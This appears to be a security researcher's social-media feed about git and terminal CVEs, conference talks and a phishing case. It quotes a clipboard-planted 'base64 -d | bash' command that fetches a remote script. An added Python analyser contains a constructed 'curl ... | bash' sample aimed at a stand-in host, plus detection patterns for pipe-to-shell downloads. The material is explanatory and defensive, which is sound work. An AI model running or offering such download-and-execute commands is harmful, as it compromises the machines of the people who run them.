David Leadbeater

@dgl@infosec.exchange
Monitoring 📊, SRE, Open Source, Security 🔐. Emoji fan 🦸‍♂️. Just your average cynical Brit 🇬🇧 in 🇦🇺. He/him.
🕸https://dgl.cx
☣️https://一.st

My first introduction to @dgl was finding https://dgl.cx/2023/09/ansi-terminal-security on my own and then being surprised he was a co-worker!

I got to sit down with him and chat about the recent git CVE he discovered and a lot more in our recent podcast episode.

If you don't have time for that, here's 5 minutes on the vulnerability specifically, cut from that interview: https://youtu.be/XZHxE3iWPMU

""?! ANSI Terminal security in 2023 and finding 10 CVEs

I'll be speaking at BSides Canberra: https://cfp.bsidescbr.com.au/bsides-canberra-2025/talk/8TWF8X/ -- this will cover my recent find of an RCE in Git and how that and some other vulnerabilities could be used against developers. #bsides #security
Developers, the weakest link in the supply chain? BSides Canberra 2025

Supply chain security is a topic which has been raised in profile in recent years through events such as the xz backdoor. In the open source world trust matters a lot. While trust is mostly gained through social interactions, it is also important to trust the tools themselves. This talk will detail how I found several holes in common tools, leading to the potential for attacks against developers' tooling.

This is pretty well executed phishing.

The Copy button copies to the clipboard

echo "Y3Vy[...]ggJg==" | base64 -d | bash

which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.

They even detect piping, so to read it you have to run "curl | cat".
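The clipboard trick described above, as an added example (not the poster's own code): a defender-side analyser that decodes the base64 stage without executing anything and reports the pipe-to-shell pattern inside it. The inner payload and URL are constructed for illustration; the gist from the post is not reproduced (only the visible tail `Jg==`, which decodes to `&`, is taken from the post).

```python
import base64
import re
from typing import Optional

# Constructed sample standing in for the elided "Y3Vy[...]ggJg==" payload.
SAMPLE_INNER = 'curl -fsSL https://example.invalid/stage2.sh | bash &'
SAMPLE_CLIPBOARD = 'echo "%s" | base64 -d | bash' % (
    base64.b64encode(SAMPLE_INNER.encode()).decode())

PIPE_TO_SHELL = re.compile(r'\|\s*(ba|z|da)?sh\b')   # "| bash", "| sh", ...
FETCHERS = re.compile(r'\b(curl|wget)\b')
B64_STAGE = re.compile(r'echo\s+"?([A-Za-z0-9+/=]+)"?\s*\|\s*base64\s+(-d|--decode)')


def decode_stage(cmd: str) -> Optional[str]:
    """If cmd looks like `echo "<b64>" | base64 -d ...`, return the decoded
    text; never runs anything. Returns None when nothing decodable is found."""
    m = B64_STAGE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-8', 'replace')
    except ValueError:  # binascii.Error (bad padding/alphabet) is a ValueError
        return None


def analyse(cmd: str) -> dict:
    """Static triage of a command a page asked the user to paste into a shell."""
    findings = []
    if PIPE_TO_SHELL.search(cmd):
        findings.append('outer command pipes into a shell')
    inner = decode_stage(cmd)
    if inner is not None:
        if FETCHERS.search(inner) and PIPE_TO_SHELL.search(inner):
            findings.append('decoded stage downloads a script and pipes it to a shell')
        if inner.rstrip().endswith('&'):
            findings.append('decoded stage backgrounds itself (hides from the user)')
    return {'decoded': inner, 'findings': findings, 'suspicious': bool(findings)}
```

To read the downloaded script itself without running it, do as the post says and replace the final `| bash` with `| cat` (or save it with `-o`).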

Dammit, mst. I owe you. You welcomed me to the community, you inspired me, you made me laugh, and you nudged me in the right direction when I said some dumb shit. You didn't even permaban me when I flooded #perl with a kilobyte of combining Unicode characters. I still can't believe you're just ... gone. I wanted to talk to you again.

https://www.shadowcat.co.uk/2025/07/09/ripples-they-cause-in-the-world/

“Ripples They Cause in the World” – Shadowcat Systems Limited

I found a vulnerability in git. CVE-2025-48384: Breaking git with a carriage return and cloning RCE - https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384

As the post explains this is one of my favourite classes of vulnerability, using characters that are old and sometimes forgotten.

#git #security #rce #ascii

CVE-2025-48384: Breaking Git with a carriage return and cloning RCE

🍋‍🟩 The ChatGPT app can happily render a lime, but it insists it doesn't exist.
If only solving my problem was this simple.
Ghostty 1.0.1 is out to address the most common issues people ran into with the initial release. An incredible amount of improvements mostly from contributors over the past 96 hours! ❤️ Please note there are two security advisories. https://ghostty.org/docs/install/release-notes/1-0-1
Download Ghostty

Ghostty is a fast, feature-rich, and cross-platform terminal emulator that uses platform-native UI and GPU acceleration.

Ghostty
New blog post: Ghostty 1.0.0 terminal security; https://dgl.cx/2024/12/ghostty-terminal-title (CVE-2024-56803)
Déjà vu: Ghostly CVEs in my terminal title

New blog post: restricting SFTP access with Linux user namespaces. Wherein I pass off a pretty awful shell script as a good idea.

https://dgl.cx/2024/10/restricted-sftp-with-userns

Restrict sftp with Linux user namespaces

If only solving my problem was this simple.
@dgl demonstrating that any problem is easily solvable if you're willing to ignore some of the details.
@dgl what are u+00a3 up to